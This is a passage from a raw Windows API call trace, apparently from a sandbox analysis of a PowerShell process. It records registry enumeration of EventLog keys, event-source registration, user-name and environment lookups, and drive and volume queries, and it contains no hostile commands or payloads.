lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.214] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x8, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.215] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x350) returned 0x0 [0053.215] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x2 [0053.215] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x354) returned 0x0 [0053.215] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x2 [0053.215] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x358) returned 0x0 [0053.215] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x2 [0053.215] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x35c) returned 0x0 [0053.215] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x2 [0053.215] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x360) returned 0x0 [0053.216] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x2 [0053.216] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x364) returned 0x0 [0053.216] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x2 [0053.216] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x5 [0053.218] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x368) returned 0x0 [0053.218] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x2 [0053.218] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x36c) returned 0x0 [0053.218] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x370) returned 0x0 [0053.218] RegCloseKey (hKey=0x370) returned 0x0 [0053.218] RegCloseKey (hKey=0x34c) returned 0x0 [0053.218] RegCloseKey (hKey=0x36c) returned 0x0 [0053.218] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9bc | out: phkResult=0x14e9bc*=0x36c) returned 0x0 [0053.218] RegQueryInfoKeyW (in: hKey=0x36c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14ea24, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ea20, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14ea24*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ea20*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.219] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x0, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.219] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x1, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.219] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x2, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.219] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x3, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.219] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x4, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.219] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x5, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.219] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x6, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.219] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x7, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.220] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x8, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.220] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x34c) returned 0x0 [0053.220] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x2 [0053.220] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x370) returned 0x0 [0053.220] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x2 [0053.220] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x374) returned 0x0 [0053.220] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x2 [0053.220] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x378) returned 0x0 [0053.220] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x2 [0053.220] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x37c) returned 0x0 [0053.221] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x2 [0053.221] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x380) returned 0x0 [0053.221] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x2 [0053.221] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x5 [0053.223] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x384) returned 0x0 [0053.223] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x2 [0053.223] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x388) returned 0x0 [0053.223] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x38c) returned 0x0 [0053.223] RegCloseKey (hKey=0x38c) returned 0x0 [0053.223] RegCloseKey (hKey=0x36c) returned 0x0 [0053.224] RegCloseKey (hKey=0x388) returned 0x0 [0053.224] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9b0 | out: phkResult=0x14e9b0*=0x388) returned 0x0 [0053.224] RegQueryInfoKeyW (in: hKey=0x388, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14ea18, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ea14, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14ea18*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ea14*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.224] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x0, lpName=0x3175c0, lpcchName=0x14ea34, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14ea34, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.224] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x1, lpName=0x3175c0, lpcchName=0x14ea34, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14ea34, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.224] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x2, lpName=0x3175c0, lpcchName=0x14ea34, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14ea34, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.224] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x3, lpName=0x3175c0, lpcchName=0x14ea34, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14ea34, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.224] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x4, lpName=0x3175c0, lpcchName=0x14ea34, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14ea34, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.225] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x5, lpName=0x3175c0, lpcchName=0x14ea34, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14ea34, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.225] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x6, lpName=0x3175c0, lpcchName=0x14ea34, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14ea34, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.225] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x7, lpName=0x3175c0, lpcchName=0x14ea34, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14ea34, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.225] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x8, lpName=0x3175c0, lpcchName=0x14ea34, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14ea34, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.225] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x36c) returned 0x0 [0053.225] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x0) returned 0x2 [0053.225] RegOpenKeyExW (in: hKey=0x388, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x38c) returned 0x0 [0053.225] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x0) returned 0x2 [0053.226] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x390) returned 0x0 [0053.226] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x0) returned 0x2 [0053.226] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x394) returned 0x0 [0053.226] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x0) returned 0x2 [0053.226] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x398) returned 0x0 [0053.226] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x0) returned 0x2 [0053.226] RegOpenKeyExW (in: hKey=0x388, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x39c) returned 0x0 [0053.226] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x0) returned 0x2 [0053.226] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x0) returned 0x5 [0053.228] RegOpenKeyExW (in: hKey=0x388, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x3a0) returned 0x0 [0053.228] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x0) returned 0x2 [0053.228] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x3a4) returned 0x0 [0053.228] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x3a8) returned 0x0 [0053.229] RegCloseKey (hKey=0x3a8) returned 0x0 [0053.229] RegCloseKey (hKey=0x388) returned 0x0 [0053.229] RegCloseKey (hKey=0x3a4) returned 0x0 [0053.233] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x4390004 [0053.235] GetLastError () returned 0x0 [0053.236] ReportEventW (hEventLog=0x4390004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x29af62c*="WSMan", lpRawData=0x29af4d4) returned 1 [0053.239] GetLastError () returned 0x0 [0053.240] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.240] GetLastError () returned 0xcb [0053.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e554, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.240] GetLastError () returned 0xcb [0053.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e504, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.241] GetLastError () returned 0xcb [0053.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e504, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.241] GetLastError () returned 0xcb [0053.241] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x358040, nSize=0x14eb54 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x14eb54) returned 0x1 [0053.241] GetLastError () returned 0xcb [0053.241] GetUserNameW (in: lpBuffer=0x3175c0, pcbBuffer=0x14eb5c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x14eb5c) returned 1 [0053.242] ReportEventW (hEventLog=0x4390004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x29b34d8*="Alias", lpRawData=0x29b3394) returned 1 [0053.242] GetLastError () returned 0x0 [0053.242] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.242] GetLastError () returned 0xcb [0053.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e554, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.243] GetLastError () returned 0xcb [0053.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e504, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.243] GetLastError () returned 0xcb [0053.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e504, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.243] GetLastError () returned 0xcb [0053.243] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x358040, nSize=0x14eb54 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x14eb54) returned 0x1 [0053.243] GetLastError () returned 0xcb [0053.243] GetUserNameW (in: lpBuffer=0x3175c0, pcbBuffer=0x14eb5c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x14eb5c) returned 1 [0053.244] ReportEventW (hEventLog=0x4390004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x29b743c*="Environment", lpRawData=0x29b72f8) returned 1 [0053.244] GetLastError () returned 0x0 [0053.245] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.245] GetLastError () returned 0xcb [0053.245] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0053.245] GetLastError () returned 0xcb [0053.245] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="\\Users\\BGC6u8Oy yXGxkR") returned 0x16 [0053.245] GetLastError () returned 0xcb [0053.246] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR", nBufferLength=0x105, lpBuffer=0x14e684, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR", lpFilePart=0x0) returned 0x18 [0053.246] GetLastError () returned 0xcb [0053.246] SetErrorMode (uMode=0x1) returned 0x1 [0053.246] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR" (normalized: "c:\\users\\bgc6u8oy yxgxkr"), fInfoLevelId=0x0, lpFileInformation=0x14eb04 | out: lpFileInformation=0x14eb04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x233be580, ftCreationTime.dwHighDateTime=0x1d2dbc2, ftLastAccessTime.dwLowDateTime=0x23db61a0, ftLastAccessTime.dwHighDateTime=0x1d2dbc2, ftLastWriteTime.dwLowDateTime=0x23db61a0, ftLastWriteTime.dwHighDateTime=0x1d2dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0053.246] GetLastError () returned 0xcb [0053.246] SetErrorMode (uMode=0x1) returned 0x1 [0053.250] GetLogicalDrives () returned 0x4 [0053.250] GetLastError () returned 0xcb [0053.254] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14e5a8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.254] GetLastError () returned 0xcb [0053.255] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0053.255] GetLastError () returned 0xcb [0053.255] SetErrorMode (uMode=0x1) returned 0x1 [0053.257] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3176c0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x14ead0, lpMaximumComponentLength=0x14eacc, lpFileSystemFlags=0x14eac8, lpFileSystemNameBuffer=0x3175c0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14ead0*=0x78b95e2e, lpMaximumComponentLength=0x14eacc*=0xff, lpFileSystemFlags=0x14eac8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0053.257] GetLastError () returned 0xcb [0053.257] SetErrorMode (uMode=0x1) returned 0x1 [0053.257] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0053.257] GetLastError () returned 0xcb [0053.257] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14e630, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.257] GetLastError () returned 0xcb [0053.257] SetErrorMode (uMode=0x1) returned 0x1 [0053.257] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x29b865c | out: lpFileInformation=0x29b865c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x16ecdf0, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x16ecdf0, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0053.257] GetLastError () returned 0xcb [0053.257] SetErrorMode (uMode=0x1) returned 0x1 [0053.257] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14e630, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.257] GetLastError () returned 0xcb [0053.257] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14e5bc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.257] GetLastError () returned 0xcb [0053.257] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0053.257] GetLastError () returned 0xcb [0053.259] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14e578, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.259] GetLastError () returned 0xcb [0053.259] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0053.259] GetLastError () returned 0xcb [0053.259] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14e580, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.259] GetLastError () returned 0xcb [0053.259] SetErrorMode (uMode=0x1) returned 0x1 [0053.259] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x29b92b4 | out: 